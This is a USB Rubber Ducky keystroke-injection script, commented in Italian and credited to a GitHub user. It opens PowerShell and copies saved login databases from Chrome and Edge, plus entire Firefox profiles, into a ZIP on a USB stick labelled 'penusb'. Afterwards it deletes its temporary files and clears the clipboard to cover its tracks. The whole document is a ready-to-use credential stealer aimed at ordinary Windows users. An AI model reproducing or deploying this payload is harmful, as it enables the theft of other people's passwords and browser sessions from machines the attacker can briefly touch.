REM ##################################################################################################################
REM ##############                 Questo script è stato creato da github.com/hacktechgames                 ##############
REM ##############      Questo script estrae i dati dei browser e li salva su una penna USB             ##############
REM##############      La pen usb deve avere label con nome "penusb" (senza virgolette) inseriscila e avvia lo script ##############
REM ##################################################################################################################
REM Apri PowerShell
DELAY 3000
GUI r
DELAY 3000
STRING powershell
DELAY 3000
ENTER
DELAY 3000
REM Trova la penna USB con label "penusb"
STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq 'penusb' } | Select-Object -ExpandProperty DriveLetter;
ENTER
DELAY 3000
STRING if ($usbDrive -eq $null) { Write-Output "Penna USB non trovata."; exit; }
ENTER
DELAY 3000
REM Crea una cartella temporanea per i dati estratti
STRING $tempFolder = "$env:TEMP\BrowserData";
ENTER
DELAY 3000
STRING New-Item -ItemType Directory -Path $tempFolder -Force;
ENTER
DELAY 3000
REM Estrai i dati di accesso di Chrome
STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data";
ENTER
DELAY 3000
STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$tempFolder\ChromeLoginData"; }
ENTER
DELAY 3000
REM Estrai i dati di accesso di Firefox
STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\";
ENTER
DELAY 3000
STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$tempFolder\FirefoxData"; }
ENTER
DELAY 3000
REM Estrai i dati di accesso di Edge
STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data";
ENTER
DELAY 3000
STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$tempFolder\EdgeLoginData"; }
ENTER
DELAY 3000
REM Crea un file ZIP con i dati estratti
STRING $zipFile = "$usbDrive\BrowserData.zip";
ENTER
DELAY 3000
STRING Compress-Archive -Path "$tempFolder\*" -DestinationPath $zipFile;
ENTER
DELAY 3000
REM Pulisci i file temporanei
STRING Remove-Item -Path $tempFolder -Recurse -Force;
ENTER
DELAY 3000
REM Pulisci la clipboard per rimuovere eventuali dati sensibili
STRING echo off | clip
ENTER
DELAY 3000
REM Chiudi PowerShell
STRING exit
ENTER
DELAY 3000